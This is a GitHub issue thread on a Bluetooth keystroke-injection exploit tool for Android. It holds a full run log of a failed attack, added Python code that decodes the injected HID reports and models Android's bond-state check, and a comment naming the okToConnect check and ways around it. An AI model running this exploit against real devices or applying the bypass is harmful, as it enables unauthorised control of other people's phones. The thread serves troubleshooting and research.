marcnewlin/hi_my_name_is_keyboard

I run it on both unpatched Android phones using NetHunter


It keeps navigating between icons but does not open the browser or inject code, and then turns back with an error:

└─# ./keystroke-injection-android-linux.py -i hci0 -t 64:D0:D6:4E:44:85
[2024-02-27 16:40:26.283] executing 'sudo service bluetooth restart'
[2024-02-27 16:40:27.994] configuring Bluetooth adapter
[2024-02-27 16:40:28.008] calling RegisterProfile
[2024-02-27 16:40:28.017] running dbus loop
[2024-02-27 16:40:28.126] executing 'sudo hciconfig hci0 name Hi, My Name is Keyboard'
[2024-02-27 16:40:28.184] executing 'hciconfig hci0 name'
[2024-02-27 16:40:28.194] executing 'sudo hciconfig hci0 class 0x002540'
[2024-02-27 16:40:28.236] executing 'hciconfig hci0 class'
[2024-02-27 16:40:28.242] executing 'hcitool name 64:D0:D6:4E:44:85'
[2024-02-27 16:40:28.855] connecting to SDP
[2024-02-27 16:40:28.856] connecting to 64:D0:D6:4E:44:85 on port 1
[2024-02-27 16:40:30.386] SUCCESS! connected on port 1
[2024-02-27 16:40:30.387] executing 'sudo btmgmt --index hci0 io-cap 1'
[2024-02-27 16:40:30.446] executing 'sudo btmgmt --index hci0 ssp 1'
[2024-02-27 16:40:30.485] connected to SDP (L2CAP 1) on target
[2024-02-27 16:40:30.504] 'NoInputNoOutput' pairing-agent is running
[2024-02-27 16:40:30.742] connecting to 64:D0:D6:4E:44:85 on port 19
[2024-02-27 16:40:32.125] SUCCESS! connected on port 19
[2024-02-27 16:40:32.126] connecting to 64:D0:D6:4E:44:85 on port 17
[2024-02-27 16:40:32.150] SUCCESS! connected on port 17
[2024-02-27 16:40:32.151] connecting to HID Interrupt
[2024-02-27 16:40:32.152] connecting to 64:D0:D6:4E:44:85 on port 19
[2024-02-27 16:40:32.177] SUCCESS! connected on port 19
[2024-02-27 16:40:32.177] connected to HID Interrupt (L2CAP 19) on target
[2024-02-27 16:40:32.178] connected to HID Control (L2CAP 17) on target
[2024-02-27 16:40:32.329] [RX-17] 9000
[2024-02-27 16:40:32.330] [TX-17] 00
[2024-02-27 16:40:32.354] [RX-17] 15
[2024-02-27 16:40:32.430] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.431] injecting Tab keypresses for 10 seconds
[2024-02-27 16:40:32.432] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.437] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.492] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.498] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.861] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.866] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.922] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.927] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.982] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.987] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.042] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.048] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.103] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.109] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.165] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.170] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.226] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.231] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.287] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.292] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.348] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.353] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.409] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.414] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.469] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.474] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.530] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.536] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.592] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.597] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.653] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.658] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.713] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.719] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.775] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.780] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.836] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.841] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.897] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.903] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.960] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.965] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.020] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.025] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.081] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.086] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.141] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.146] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.202] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.207] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.263] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.268] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.324] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.330] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.386] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.392] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.447] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.455] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.510] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.516] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.572] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.577] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.633] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.638] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.694] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.699] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.755] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.760] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.816] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.822] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.878] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.883] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.939] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.945] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.001] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.006] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.062] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.067] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.123] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.128] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.184] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.190] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.246] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.251] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.306] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.312] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.368] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.373] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.429] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.434] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.490] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.495] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.551] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.556] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.612] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.617] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.673] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.678] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.734] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.740] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.795] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.801] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.857] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.862] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.920] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.925] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.981] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.987] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.042] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.048] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.103] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.109] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.166] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.171] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.226] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.232] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.288] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.293] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.349] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.354] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.409] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.416] [TX-19] a101000000000000000000
Exception in thread Thread-1 (loop):
Traceback (most recent call last):
File "", line 3, in recv
_bluetooth.error: (104, 'Connection reset by peer')

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
self.run()
File "/usr/lib/python3.11/threading.py", line 982, in run
self._target(*self._args, **self._kwargs)
File "/hi_my_name_is_keyboard/injector/client.py", line 135, in loop
raw = self.c1.recv()
^^^^^^^^^^^^^^
File "/hi_my_name_is_keyboard/injector/client.py", line 55, in recv
raise ex
File "/hi_my_name_is_keyboard/injector/client.py", line 48, in recv
raw = self.sock.recv(64)
^^^^^^^^^^^^^^^^^^
File "", line 5, in recv
bluetooth.btcommon.BluetoothError: [Errno 104] Connection reset by peer
Traceback (most recent call last):
File "", line 3, in send
_bluetooth.error: (104, 'Connection reset by peer')

First it didn't work, then it asked me to install the dbus module. I installed it and ran it again, and that's the outcome. When I go back to the NetHunter Bluetooth Arsenal it shows me the interface is down. Has anyone successfully run it on NetHunter?
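For anyone reading the `[TX-19]` lines above: they are raw Bluetooth HID interrupt-channel frames, and decoding them makes it obvious what the host saw before it reset the link (a burst of Tab presses, each followed by an all-zero release report). The decoder below is an added example written for this thread, not code from the hi_my_name_is_keyboard project. It parses log lines in the same `[timestamp] [TX-psm] hex` format the tool prints, treats byte 0 as the HID transaction header (high nibble 0xA = DATA, low nibble 1 = Input report), byte 1 as the report ID, byte 2 as the modifier bitmap, byte 3 as reserved and everything after that as the key array, and maps the usage IDs to names. The sample log is constructed for the example; it goes a little beyond the page by also showing a shifted letter, since a real capture will rarely contain a single key.

```python
import re

# Constructed sample in the tool's log format (not copied from a real run):
# a Tab press and release, then Shift+h press and release, plus one control-channel frame.
SAMPLE_LOG = """\
[2024-02-27 16:40:32.329] [RX-17] 9000
[2024-02-27 16:40:32.330] [TX-17] 00
[2024-02-27 16:40:32.430] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.432] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.437] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.492] [TX-19] a10102000b000000000000
[2024-02-27 16:40:32.498] [TX-19] a101000000000000000000
"""

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<dir>RX|TX)-(?P<psm>\d+)\] (?P<hex>[0-9a-fA-F]+)$"
)

HID_INTERRUPT_PSM = 19          # L2CAP PSM for HID Interrupt, as in the log
TRANSACTION_DATA = 0xA          # high nibble of the HID transaction header
REPORT_TYPE_INPUT = 0x1         # low nibble: Input report

MODIFIER_BITS = {0x01: "LCtrl", 0x02: "LShift", 0x04: "LAlt", 0x08: "LGUI",
                 0x10: "RCtrl", 0x20: "RShift", 0x40: "RAlt", 0x80: "RGUI"}

SPECIAL_KEYS = {0x28: "Enter", 0x29: "Escape", 0x2A: "Backspace",
                0x2B: "Tab", 0x2C: "Space"}


def usage_to_name(code: int) -> str:
    """Map a HID keyboard usage ID to a readable key name (letters, digits, a few specials)."""
    if 0x04 <= code <= 0x1D:
        return chr(ord("a") + code - 0x04)
    if 0x1E <= code <= 0x26:
        return chr(ord("1") + code - 0x1E)
    if code == 0x27:
        return "0"
    return SPECIAL_KEYS.get(code, f"0x{code:02x}")


def decode_input_report(frame: bytes):
    """Decode one interrupt-channel frame; return None if it is not a DATA/Input report."""
    if len(frame) < 4:
        return None
    header = frame[0]
    if header >> 4 != TRANSACTION_DATA or header & 0x0F != REPORT_TYPE_INPUT:
        return None
    report_id, modifiers = frame[1], frame[2]
    # frame[3] is the reserved byte; the key array follows it and may be 6 or more slots
    keys = [usage_to_name(k) for k in frame[4:] if k != 0]
    mods = [name for bit, name in MODIFIER_BITS.items() if modifiers & bit]
    return {"report_id": report_id, "modifiers": mods, "keys": keys}


def keystrokes_from_log(text: str):
    """Return (timestamp, modifiers, keys) for every interrupt-channel report carrying a key press.

    All-zero reports are key releases and are skipped; control-channel (PSM 17) frames are ignored.
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or int(m.group("psm")) != HID_INTERRUPT_PSM:
            continue
        report = decode_input_report(bytes.fromhex(m.group("hex")))
        if report is None or not report["keys"]:
            continue
        events.append((m.group("ts"), report["modifiers"], report["keys"]))
    return events


def summarize(events):
    """Count presses per key combination so a burst of identical keys stands out at a glance."""
    counts = {}
    for _, mods, keys in events:
        for key in keys:
            label = "+".join(mods + [key])
            counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    for ts, mods, keys in keystrokes_from_log(SAMPLE_LOG):
        print(ts, "+".join(mods + keys))
    print(summarize(SAMPLE_LOG and keystrokes_from_log(SAMPLE_LOG)))
```

Run it against a saved copy of the tool's output and the summary shows the key counts; on the log in this issue it would report several dozen Tab presses and nothing else, which matches the "navigating between icons" behaviour before the host dropped the connection.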

After encountering the same issue on my phone and digging a bit into it, I believe I know what's going on. It's an accidental "protection" added to Android around 2018. Basically, the higher layers in the BT stack signal the BT firmware to close the connection because it's in an unexpected state (that's the 104, 'connection reset by peer' error you're seeing).

The specific issue comes from Android's HID Host Service detecting it got a connection that's not fully paired (connection is not yet in BONDED state) which makes it invalid. The HID Host Service signals that it shouldn't connect with the device. You can find the "offending" function, okToConnect, at src/com/android/bluetooth/hid/HidHostService.java in the Bluetooth app package of the AOSP sources.

My quick workaround to move forward with my research was to change that function to return true regardless of the bonding state, but a more "real world" solution would be to run the exploit against an Android image released prior to November 2018. I don't know BT well enough to know if you can make an unauthenticated connection reach bonded state. I doubt it's possible since the whole vulnerability in the CVE revolves around the legacy mode that allows unbonded connections.
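To make the mechanism in the comment above concrete, here is a small model of the bond-state gate it describes, written as an added example for this thread; it is not AOSP code and does not reproduce the real okToConnect, only the one decision the comment attributes to it. The three bond states mirror the names Android exposes (BOND_NONE, BOND_BONDING, BOND_BONDED), the PSMs are the ones visible in the log (1 for SDP, 17 for HID Control, 19 for HID Interrupt), and the "permissive" gate stands for both the pre-2018 behaviour and the workaround of returning true unconditionally. The session simulation is a hypothetical simplification: it brings the channels up as the log shows and then lets the HID Host Service decide, which is why the initiator sees the link reset only after the channels were already connected.

```python
from enum import Enum


class BondState(Enum):
    """Bond states as Android names them; the string values are this example's own labels."""
    NONE = "BOND_NONE"
    BONDING = "BOND_BONDING"
    BONDED = "BOND_BONDED"


# L2CAP PSMs seen in the log: SDP, HID Control, HID Interrupt
SDP_PSM, HID_CONTROL_PSM, HID_INTERRUPT_PSM = 1, 17, 19


def ok_to_connect_permissive(bond_state: BondState) -> bool:
    """Model of behaviour with no bond-state check (pre-2018 images, or the
    comment's workaround of returning true): the bond state is never consulted."""
    return True


def ok_to_connect_hardened(bond_state: BondState) -> bool:
    """Model of the check the comment describes in HidHostService.okToConnect:
    a peer that has not reached BOND_BONDED is not allowed to act as a HID device."""
    return bond_state is BondState.BONDED


def simulate_hid_session(bond_state: BondState, gate) -> list:
    """Hypothetical host-side sequence for one inbound HID connection.

    The L2CAP channels come up in the order the log shows; only then does the
    HID Host Service evaluate the gate. A refusal closes the link, which the
    initiating side observes as 'Connection reset by peer' (errno 104).
    Returns the list of events in order.
    """
    events = [f"l2cap connected psm {psm}" for psm in (SDP_PSM, HID_INTERRUPT_PSM, HID_CONTROL_PSM)]
    if gate(bond_state):
        events.append("hid host: accepted")
    else:
        events.append(f"hid host: refused ({bond_state.value}), closing link -> peer sees errno 104")
    return events


def link_survives(bond_state: BondState, gate) -> bool:
    """True if the HID session stays up under the given gate."""
    return simulate_hid_session(bond_state, gate)[-1] == "hid host: accepted"


if __name__ == "__main__":
    for state in BondState:
        for gate in (ok_to_connect_permissive, ok_to_connect_hardened):
            print(gate.__name__, state.value, "->", simulate_hid_session(state, gate)[-1])
```

The table the script prints is the whole point of the comment: with the hardened gate only BOND_BONDED survives, so an unbonded connection reaches the interrupt channel, sends its reports, and is then torn down by the host, exactly the shape of the log in this issue.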